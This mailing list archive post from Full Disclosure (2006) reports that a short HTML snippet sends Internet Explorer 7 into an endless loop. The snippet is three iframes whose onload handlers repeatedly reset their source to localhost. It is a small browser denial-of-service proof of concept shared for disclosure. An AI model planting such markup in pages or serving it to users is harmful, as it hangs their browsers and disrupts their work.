|
Full Disclosure
mailing list archives
IE7 endless loop
From: Ben Lambrey <ben () lambrey net>
Date: Sat, 4 Nov 2006 19:24:19 +0100
With this small code IE7 seems to go in a endless loop.
Is this new?
<HTML>
<iframe src src=a onload= this.src='http://127.0.0.1';this.onload=function()
{};>
<iframe src src=a onload= this.src='http://127.0.0.1';this.onload=function()
{};>
<iframe src src=a onload= this.src='http://127.0.0.1';this.onload=function()
{};>
</HTML>
Ben.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
By Date
By Thread
Current thread:
- IE7 endless loop Ben Lambrey (Nov 04)
|